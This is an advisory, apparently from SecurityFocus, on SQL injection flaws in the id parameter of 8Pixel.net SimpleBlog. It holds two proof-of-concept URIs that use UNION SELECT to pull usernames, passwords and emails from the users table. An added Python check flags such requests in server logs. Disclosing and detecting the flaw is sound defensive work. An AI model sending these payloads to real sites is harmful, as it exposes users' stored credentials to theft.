8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USE
http://www.example.com/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
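
A detection check for the request pattern shown above, run over web-server request URIs. This is an added example, not part of the original advisory or of SimpleBlog; it assumes that a legitimate `id` value is a non-negative integer, and the sample URIs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages named in the advisory's proof-of-concept URIs.
WATCHED_PAGES = ("/default.asp", "/admin/edit.asp")
SQL_KEYWORDS = re.compile(r"\b(union|select|from)\b", re.IGNORECASE)

# Constructed sample request URIs (not taken from real logs).
SAMPLE_URIS = [
    "/blog/default.asp?view=plink&id=12",
    "/blog/default.asp?view=plink&id=-1%20UNION%20SELECT%20null,null",
    "/blog/admin/edit.asp?ID=-1+union+select+0,0",
    "/blog/admin/edit.asp?id=7%27",
    "/blog/other.asp?id=abc",
]


def check_request(uri):
    """Return a reason string if the id parameter looks suspicious, else None."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(WATCHED_PAGES):
        return None
    # parse_qsl percent-decodes and turns '+' into a space, so both
    # encodings used in the proof-of-concept URIs normalise to the same text.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "id":  # ASP treats parameter names case-insensitively
            continue
        if SQL_KEYWORDS.search(value):
            return "sql-keyword-in-id"
        if not re.fullmatch(r"\d+", value):  # assumption: ids are plain integers
            return "non-numeric-id"
    return None


def scan(uris):
    """Return (uri, reason) pairs for every flagged request."""
    return [(u, r) for u in uris if (r := check_request(u)) is not None]


if __name__ == "__main__":
    for uri, reason in scan(SAMPLE_URIS):
        print(f"{reason}\t{uri}")
```

The same integer-only rule, enforced in the application before the value reaches the query, removes the injection point rather than only detecting its use.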


 

Copyright 2010, SecurityFocus